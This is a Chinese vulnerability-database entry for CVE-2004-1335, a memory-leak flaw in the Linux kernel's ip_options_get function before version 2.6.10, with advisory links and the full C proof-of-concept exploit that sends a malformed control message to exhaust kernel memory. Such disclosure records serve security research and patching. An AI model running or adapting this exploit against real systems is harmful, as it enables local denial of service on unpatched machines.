Linux Kernel多个本地漏洞-安全小百科

Linux Kernel多个本地漏洞

漏洞ID	1108371	漏洞类型	未知
发布时间	2004-12-16	更新时间	2005-10-20
CVE编号	CVE-2004-1335	CNNVD-ID	CNNVD-200412-067
漏洞平台	Linux	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/692
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-067

|漏洞详情

Linuxkernel2.6.10以前的版本的ip_options_get函数存在内存泄漏漏洞，本地用户通过重复的调用ip_cmsg_send函数导致服务拒绝（内存消耗）。

|漏洞EXP

/* int overflow in ip_options_get
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases (like securityfocus and mitre)
 * */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s;
struct sockaddr_in sockad; 
char msg[128];
struct cmsghdr *cmsg,*cm2; 
char opts[12];

s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080); 

connect(s,(struct sockaddr *) &sockad, sizeof(sockad)); 

memset(msg,'v',sizeof(msg));
memset(opts,0,sizeof(opts));
#define VV 1024*1024
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len =  -1;

msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);

msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + 420; 
msghdr.msg_iov = iovector;

msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
system("sync");
if ((i = sendmsg(s, &msghdr, 0)) < 0)
 perror("sendmsg");
return 42;
}

// milw0rm.com [2004-12-16]

|参考资料

来源:XF
名称:linux-ipoptionsget-memory-leak(18524)
链接:http://xforce.iss.net/xforce/xfdb/18524
来源:FULLDISC
名称:20041215funwithlinuxkernel
链接:http://www.securitytrap.com/mail/full-disclosure/2004/Dec/0323.html
来源:BID
名称:11956
链接:http://www.securityfocus.com/bid/11956
来源:www.guninski.com
链接:http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html
来源:BUGTRAQ
名称:20041215[USN-47-1]Linuxkernelvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110383108211524&w;=2
来源:OVAL
名称:oval:org.mitre.oval:def:11085
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11085
来源:REDHAT
名称:RHSA-2005:017
链接:http://www.redhat.com/support/errata/RHSA-2005-017.html
来源:REDHAT
名称:RHSA-2005:016
链接:http://www.redhat.com/support/errata/RHSA-2005-016.html
来源:DEBIAN
名称:DSA-1082
链接:http://www.debian.org/security/2006/dsa-1082
来源:DEBIAN
名称:DSA-1070
链接:http://www.debian.org/security/2006/dsa-1070
来源:DEBIAN
名称:DSA-1069
链接:http://www.debian.org/security/2006/dsa-1069
来源:DEBIAN
名称:DSA-106

相关推荐: GetSolutions GetIntranet Multiple Remote Input Validation Vulnerabilities

GetSolutions GetIntranet Multiple Remote Input Validation Vulnerabilities 漏洞ID 1097941 漏洞类型 Input Validation Error 发布时间 2004-09-10…

文章版权归作者所有，未经允许请勿转载。

THE END